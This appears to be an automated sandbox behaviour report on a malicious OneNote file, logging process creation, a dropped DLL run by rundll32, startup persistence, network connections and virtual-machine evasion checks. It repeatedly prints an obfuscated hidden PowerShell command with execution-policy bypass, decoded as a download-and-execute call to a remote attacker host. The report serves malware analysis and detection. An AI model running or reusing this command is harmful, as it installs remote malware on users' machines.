            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\Documents\{1C084D6C-B050-4E92-95A9-F886B6BDC119}Jump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Local\Temp\{D89CE307-352E-454E-AFDE-CBF75B7C372F} - OProcSessId.datJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winONE@13/603@315/3
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile read: C:\Program Files (x86)\desktop.iniJump to behavior
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000000180051830 GetCurrentProcess,GetLastError,FormatMessageA,LocalFree,InitializeCriticalSection,GetCurrentProcess,GetCurrentProcess,EnterCriticalSection,LeaveCriticalSection,GetLastError,FormatMessageA,LocalFree,10_2_0000000180051830
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\MZvYng.bin,init
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEMutant created: \Sessions\1\BaseNamedObjects\OneNoteM:AppShared
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3000:120:WilError_01
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
            Source: Binary string: /var/tmp/build/firefox-7def1d4ea99a/obj-x86_64-w64-mingw32/mozglue/build/mozglue.pdb source: powershell.exe, 00000004.00000002.433111959.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmp, MZvYng.bin.4.dr

            Data Obfuscation

            barindex
            PowerShell case anomaly found
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=Jump to behavior
            Suspicious powershell command line found
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_2_0562F9A0 pushad ; ret 1_2_0562F9A1
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_2_0562FA74 pushad ; ret 1_2_0562FAD9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_075A2600 push es; ret 4_2_075A2610
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_075A2520 push es; ret 4_2_075A2530
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_075A2442 push es; ret 4_2_075A2450
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_075A2360 push es; ret 4_2_075A2370
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_075A2282 push es; ret 4_2_075A2290
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_075A2130 push es; ret 4_2_075A2140
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_075A21A2 push es; ret 4_2_075A21B0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_075A20C2 push es; ret 4_2_075A20D0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_075A50E0 push es; retf 4_2_075A50EC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_075A5080 push es; ret 4_2_075A5090
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_078084C0 push D4076E23h; ret 4_2_078084CD
            Source: MZvYng.bin.4.drStatic PE information: section name: .buildid
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000000180043620 LoadLibraryW,GetProcAddress,FreeLibrary,10_2_0000000180043620
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\MZvYng.binJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnkJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnkJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 0000017523531825 second address: 000001752353184A instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
            Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 000001752353185F second address: 000001752353186C instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
            Contains functionality to detect hardware virtualization (CPUID execution measurement)
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000017523531804 10_2_0000017523531804
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1072Thread sleep count: 5074 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4312Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 396Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\rundll32.exe TID: 5940Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\System32\rundll32.exe TID: 4660Thread sleep count: 170 > 30Jump to behavior
            Source: C:\Windows\System32\rundll32.exe TID: 4660Thread sleep time: -5100000s >= -30000sJump to behavior
            Source: C:\Windows\System32\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_10-14555
            Source: C:\Windows\System32\rundll32.exeLast function: Thread delayed
            Source: C:\Windows\System32\rundll32.exeLast function: Thread delayed
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000017523532C20 rdtsc 10_2_0000017523532C20
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5074Jump to behavior
            Source: C:\Windows\System32\rundll32.exeAPI coverage: 3.9 %
            Source: C:\Windows\System32\rundll32.exeCode function: LoadLibraryA,GetAdaptersInfo,GetAdaptersInfo,10_2_0000017523532610
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000000180004810 GetSystemInfo,EnterCriticalSection,LeaveCriticalSection,10_2_0000000180004810
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 60000Jump to behavior
            Source: powershell.exe, 00000004.00000002.433111959.0000000004E48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
            Source: powershell.exe, 00000004.00000002.433111959.0000000004E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.433111959.0000000004A7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
            Source: rundll32.exe, 0000000A.00000003.459326539.0000017521BA9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.835726070.0000017521B58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.460951995.0000017521BA9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.456819458.0000017521BA9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.462327553.0000017521BA9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.453979630.0000017521BA9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.431626222.0000017521BA9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.465239910.0000017521BA9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.475037143.0000017521BA9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.470290806.0000017521BA9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.432783014.0000017521BA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: mshta.exe, 00000001.00000003.311100035.0000000001006000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000000180043620 LoadLibraryW,GetProcAddress,FreeLibrary,10_2_0000000180043620
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000017523532C20 rdtsc 10_2_0000017523532C20
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 45.61.136.59 80Jump to behavior
            Source: C:\Windows\System32\rundll32.exeDomain query: kropnagursa.com
            Yara detected Powershell download and execute
            Source: Yara matchFile source: amsi32_4608.amsi.csv, type: OTHER
            Bypasses PowerShell execution policy
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=
            Encrypted powershell cmdline option found
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded IEX (New-Object Net.Webclient).downloadstring("http://corsanave.top/gatef.php")
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded IEX (New-Object Net.Webclient).downloadstring("http://corsanave.top/gatef.php")Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -nop -w hidden -ep bypass -enc sqbfafgaiaaoae4azqb3ac0atwbiagoazqbjahqaiaboaguadaauafcazqbiagmababpaguabgb0ackalgbkag8adwbuagwabwbhagqacwb0ahiaaqbuagcakaaiaggadab0ahaaogavac8aywbvahiacwbhag4ayqb2agualgb0ag8acaavagcayqb0aguazgauahaaaabwaciakqa=
